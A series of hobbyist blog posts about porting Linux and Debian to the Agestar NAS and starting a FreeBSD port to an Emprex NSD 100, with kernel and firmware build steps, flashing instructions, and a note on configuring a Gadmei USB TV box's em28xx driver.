http://tinyhack.com/agestar/zImage-2.6.29

when i have the time, i will work on creating a new firmware image.

Some changes:

  • The machine ID is now registered in http://www.arm.linux.org.uk/developer/machines/
  • The network problem instability has now been fixed
  • Added new configuration option to select memory size based on your board memory (16, 32, or 64 mb). Note: selecting values larger than the supported size will cause crash.

The other news is that Bruce M Simpson has donated me an Emprex NSD 100 for porting FreeBSD to it. I have started my work, but the progress will be slower from the Linux at the beginning, because:

  1. I am more familiar with Linux kernel compared to FreeBSD kernel
  2. Currently FreeBSD kernel itself doesn’t support many ARM devices yet, so to find an exmple of something I need to look at NetBSD, (and it helps, for example the Faraday 526 processor support is already in NetBSD).
  3. I am rather busy this and coming month (planning to go to Indonesia for about 10 days)

Configure Gadmei USB TV Box TVR200 in Linux

I have an old GADMEI USB TV BOX, in the back it says MODEL: TVR200. I haven’t use this since few years ago in Windows. I am planning to learn a little bit about Wii homebrew, so I thought if I can use my computer as display, I don’t have to go back and forth to my TV. When I plugged the USB TV BOX, the kernel display some messages about em28xx:

[ 3662.345631] em28xx #0: Your board has no unique USB ID and thus need a hint to be detected.
[ 3662.345634] em28xx #0: You may try to use card= insmod option to workaround that.
[ 3662.345636] em28xx #0: Please send an email with this log to:
[ 3662.345638] em28xx #0: 	V4L Mailing List 
[ 3662.345640] em28xx #0: Board eeprom hash is 0x00000000
[ 3662.345643] em28xx #0: Board i2c devicelist hash is 0xc51200e3
[ 3662.345645] em28xx #0: Here is a list of valid choices for the card= insmod option:
[ 3662.345647] em28xx #0:     card=0 -> Unknown EM2800 video grabber
[ 3662.345650] em28xx #0:     card=1 -> Unknown EM2750/28xx video grabber
[ 3662.345652] em28xx #0:     card=2 -> Terratec Cinergy 250 USB
[ 3662.345654] em28xx #0:     card=3 -> Pinnacle PCTV USB 2
[ 3662.345656] em28xx #0:     card=4 -> Hauppauge WinTV USB 2
[ 3662.345659] em28xx #0:     card=5 -> MSI VOX USB 2.0
[ 3662.345661] em28xx #0:     card=6 -> Terratec Cinergy 200 USB
[ 3662.345663] em28xx #0:     card=7 -> Leadtek Winfast USB II
[ 3662.345665] em28xx #0:     card=8 -> Kworld USB2800
[ 3662.345667] em28xx #0:     card=9 -> Pinnacle Dazzle DVC 90/DVC 100
[ 3662.345670] em28xx #0:     card=10 -> Hauppauge WinTV HVR 900
[ 3662.345672] em28xx #0:     card=11 -> Terratec Hybrid XS
[ 3662.345674] em28xx #0:     card=12 -> Kworld PVR TV 2800 RF
[ 3662.345676] em28xx #0:     card=13 -> Terratec Prodigy XS
[ 3662.345679] em28xx #0:     card=14 -> Pixelview Prolink PlayTV USB 2.0
[ 3662.345681] em28xx #0:     card=15 -> V-Gear PocketTV
[ 3662.345683] em28xx #0:     card=16 -> Hauppauge WinTV HVR 950
[ 3662.685938] em28xx #0: V4L2 device registered as /dev/video0 and /dev/vbi0

So I tried modprobe em28xx card=0 and then card=1, and then card=2, thankfully it worked with card=2. I used tvtime program to see the output of the usb tv. To make it permanent, add this line:

options em28xx card=2

to your /etc/modprobe.conf, or create a new file (any name is fine) at /etc/modprobe.d and fill it with that line. Note: audio is not working yet, but I don’t really need it right now.

Update – Debian on Agestar Firmware

Warning/Note: This is not an update to the existing firmware. This is for installing Debian. If you don’t know anything about Linux, this is not for you. This firmware DOES NOT contain web interface.

I haven’t looked again on Debian installer for Agestar, but I have built a new firmware for Debian on Agestar using the latest kernel patch (faster network). If you have installed Debian using the instruction in here, you can download zImage-20092008 to Agestar, and then do:

dd if=zImage-20092008 of=/dev/mtdblock1

If you haven’t installed Debian, then when following the instruction, but instead of using star.bin use star-20092008.bin. To make it clear, use zImage-20092008 to update existing installation, and star-20092008.bin for new installation (starting from the original Agestar firmware). If you made a mistake, then you need a serial port to unbrick your Agestar. NOTE: the web update method only works on agestar, other models can work by using serial port and latest patch for kernel source (2.6.29 or later).

If you are interested to make your own firmware, this is what you should do:

  1. Download armboot.bin and put it to a directory
  2. Download mergefile.c to the same directory as armboot.bin
  3. Compile mergefile.c (just do cc mergefile.c -o mergefile)
  4. Compile your kernel according to the instruction at http://tinyhack.com/2008/09/08/how-to-compile-kernel-for-agestar/ to create zImage, copy/move it to the same directory as armboot.bin
  5. Type ./mergefile to merge armboot.bin and zImage to star.bin.

You can use star.bin to flash (replace) original firmware. If you already installed Debian, and you want to update your kernel, you only need to build zImage and do dd if=newzImage of=/dev/mtdblock1.

How to compile kernel for Agestar

Here is a guide how to compile a kernel for your Agestar. In this latest patch from me, I have included the network driver with scatter/gather support. For FTP transfer, HTTP, or other transfers that uses sendfile syscall, the speed is about 50% faster than before, for ordinary transfer, it almost doesn’t change.

  1. Download vanilla kernel from kernel.org (use version linux-2.6.25.4)
  2. Extract kernel , and apply this patch file (patchfile-20080907.gz)
  3. Download initramfs.cpio.gz put it in the kernel directory and extract it
  4. Download my configuration file config-20080907 put it into kernel directory, rename it as .config
  5. Install an arm compiler, your distribution may have them (for instance in Debian you can use aptitude with emdebian.org repository), or download from codesourcery.com.
  6. Edit Makefile, find CROSS_COMPILE and change the value to the location and prefix of your compiler. For example, of your compiler is /opt/arm/920t_le/bin/arm_920t_le-gcc, fill in /opt/arm/920t_le/bin/arm_920t_le- (without the gcc part)
  7. To configure the kernel, type “make menuconfig”
  8. Type make to build zImage

NOTE: the zImage is NOT a FIRMWARE. You can write zImage to /dev/mtdblock1 on the agestar to update your kernel but not through the web interface. I will write another tutorial on how to make zImage into a firmware that can be flashed using the web interface.

If you want a newer kernel, start from the current kernel, and keep on patching with the next incremental patch until you reach the kernel number that you want. This is not always easy, because sometimes a patch will conflict with the changes that i have made.

Tips For Debian on Agestar

Chris (Whites11) and several others have pointed that the source code for a device similar to Agestar have been released by a German company (http://www.multicase.de/en/products/76/ns348s.html). I have not looked carefully at the source code of this one, but none of the people on the mailing list have got it working with networking enabled.

Kari Ahtiala who owned several NAS devices (SLUG, NCB3AST, NCH3AHT), said that you can just move your disk from NSLU (SLUG) to Agestar just fine:

Continue reading “Tips For Debian on Agestar”

Installing Debian on Agestar without serial port

I have prepared a firmware and tutorial to Install Debian here, this time without the need for serial port. I have tested this, and it seems that everything works. But of course I will not be responsible if anything happens. If you think there are some missing, unclear or inaccurate steps, or if you doubt about something, then don’t install it. If you have anything to ask just email to yohanes [at] gmail.com, or just post your questions as comments.

NOTE: the web update method only works on agestar ncb3ast, other models can work by using serial port and latest patch for kernel source (2.6.29 or later).

New Firmware Progress

My wife agrees that I can buy another Agestar to hack and use the other one for our network storage. With this new Agestar I can continue my hacks. Currently I am working on building a firmware that can be used to install Debian without serial port. On the first stage, I will build a generic firmware without automatic installer, so the user still needs to do some manual steps to install Debian. So it is something like the manual Debian install on NSLU2 (http://www.cyrius.com/debian/nslu2/unpack.html).  Actually because this is generic command line, you would be able to install Gentoo or something else. The next step would be to make an automatic installer like in NSLU2(http://www.cyrius.com/debian/nslu2/install.html).

The main reason why I started with manual installer is because I am not yet familiar with the Debian installer. Currently the manual installer is almost complete, I just need to test it thoroughly to make sure that this will really works without serial port. I hope I can release this in the next few days (or this weekend at the latest).